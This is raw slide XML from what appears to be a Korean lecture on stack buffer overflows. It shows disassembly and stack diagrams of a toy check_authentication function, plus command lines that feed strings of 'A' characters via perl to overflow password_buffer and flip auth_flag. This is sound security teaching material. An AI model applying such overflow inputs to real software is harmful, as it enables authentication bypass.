              </a:rPr>
              <a:t>.\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>n");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}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}</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US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42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7031415" cy="4101010"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="134000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    0x080484b1 &lt;+61&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>lea -0x1c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600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 0x080484b4 &lt;+64&gt;: mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx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 0x080484b6 &lt;+66&gt;: mov    $0x8048660,%eax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 0x080484bb &lt;+71&gt;: mov    $0x8,%ecx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 0x080484c0 &lt;+76&gt;: mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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 0x080484c2 &lt;+78&gt;: mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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 0x080484c4 &lt;+80&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>repz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> %es:(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%ds:(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:latin typeface="Monac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53905" y="5798159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317416" y="74893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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="5482934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check_auth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423F4-D4E4-5440-88D6-59F99253F98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="48299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edi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B4472-EEE3-AB4F-AC85-D890C5ABC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="4176956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esi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85B827-2DD9-394C-A83B-2BD8EF5EA0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668812" y="3525682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8407-4AEC-F440-BDAA-E21825577F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668811" y="2872693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F9A6BB-326D-1341-9D2F-7E19750216D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668810" y="222141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C42A-DE46-F54C-BF11-D02790E8B74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="15701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14BA2-A3F1-6142-AE4A-7E7C892B9B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="3665796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7214B-54B8-A541-936E-00C94CB5CFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="300753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$0x10(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AC86B-20F8-8142-BDC2-F9806A32682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="2349280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$0x14(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CF65C-4170-E54A-8D14-FBF353517D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="1691022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$0x18(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EBEA9A-7766-BD4F-9963-9C3C8E954DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="91887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B329E-41D7-6C47-9B16-E72E0FADA509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="103974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7351FF-C001-2A4F-B221-AEBBCD4FA9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="526747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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[1]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742896-0EA4-2C45-801D-24207C129859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="117125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292EB-4EE7-054C-B5B8-B51DC7AF8B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="413640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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monaco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ECAED1-F650-DA42-ADB8-D4B0236CA9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10507718" y="-63423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29D2C1-B493-6A4B-B7FC-82DEC3C4C6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616456" y="1050354"/>
            <a:ext cx="122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password_buffer</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/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B86072A4-F59A-F847-B7D0-8EAEDA6321EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733368" y="4826516"/>
            <a:ext cx="1248697" cy="532065"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2322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2474A-25CC-A04F-8EEA-B5DAE3900D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414351" y="5766646"/>
            <a:ext cx="611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b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, "brillig") == 0)</a:t>
            </a:r>
          </a:p>
          <a:p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1531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946B2A-BF9B-BA40-B6FE-EC4FAA86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607" y="690509"/>
            <a:ext cx="7031415" cy="4101010"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="13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 0x080484d5 &lt;+97&gt;: test   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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 0x080484d7 &lt;+99&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 0x80484e0 				&lt;check_authentication+108&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
            </a:endParaRP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sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x080484d9 &lt;+101&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,-0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:latin typeface="Monac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A408-E02D-A142-8DD1-75E81AA374CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7567448" y="6167491"/>
            <a:ext cx="1702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STACK</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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4A0E-9D19-E84C-9285-6497C0ABA7D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9553905" y="5798159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ebp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D3A3E-558B-8240-A6A1-28E6D59B4E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="74893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&lt;- </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>esp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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="5482934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check_auth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423F4-D4E4-5440-88D6-59F99253F98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="48299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edi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B4472-EEE3-AB4F-AC85-D890C5ABC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="4176956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%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>esi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85B827-2DD9-394C-A83B-2BD8EF5EA0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668812" y="3525682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8407-4AEC-F440-BDAA-E21825577F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668811" y="2872693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F9A6BB-326D-1341-9D2F-7E19750216D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668810" y="2221419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C42A-DE46-F54C-BF11-D02790E8B74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="1570145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14BA2-A3F1-6142-AE4A-7E7C892B9B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="3665796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7214B-54B8-A541-936E-00C94CB5CFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="300753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$0x10(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AC86B-20F8-8142-BDC2-F9806A32682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="2349280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$0x14(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CF65C-4170-E54A-8D14-FBF353517D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="1691022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$0x18(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EBEA9A-7766-BD4F-9963-9C3C8E954DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="918871"/>
            <a:ext cx="2648607" cy="6495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B329E-41D7-6C47-9B16-E72E0FADA509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="1039748"/>
            <a:ext cx="15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$0x1c(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ebp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7351FF-C001-2A4F-B221-AEBBCD4FA9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="526747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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[1]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742896-0EA4-2C45-801D-24207C129859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="117125"/>
            <a:ext cx="2648607" cy="3921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292EB-4EE7-054C-B5B8-B51DC7AF8B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="413640"/>
            <a:ext cx="1905000" cy="61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latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monaco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ECAED1-F650-DA42-ADB8-D4B0236CA9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10507718" y="-63423"/>
            <a:ext cx="1213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Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Monaco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29D2C1-B493-6A4B-B7FC-82DEC3C4C6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616456" y="1050354"/>
            <a:ext cx="122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password_buffer</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/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B86072A4-F59A-F847-B7D0-8EAEDA6321EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733368" y="4826516"/>
            <a:ext cx="1248697" cy="532065"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2322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2474A-25CC-A04F-8EEA-B5DAE3900D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414351" y="5766646"/>
            <a:ext cx="6112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b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>password_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, "brillig") == 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>auth_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="ko-KR" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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21337B-5FC5-4646-907E-CFA71D87B5B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5582183" y="3522940"/>
            <a:ext cx="122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auth_flag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937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42332-75D6-DA4D-8505-3B0AE344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91F60-7E8C-A84D-8E9B-5884D8EC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4000" dirty="0"/>
              <a:t>&gt;&gt;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./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0" err="1"/>
              <a:t>auth_overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t> $(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t> –e ’print “A”x16’) ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t>&gt;&gt;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./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0" err="1"/>
              <a:t>auth_overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t> $(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t> –e ’print “A”x17’) ?</a:t>
            </a:r>
          </a:p>
          <a:p>
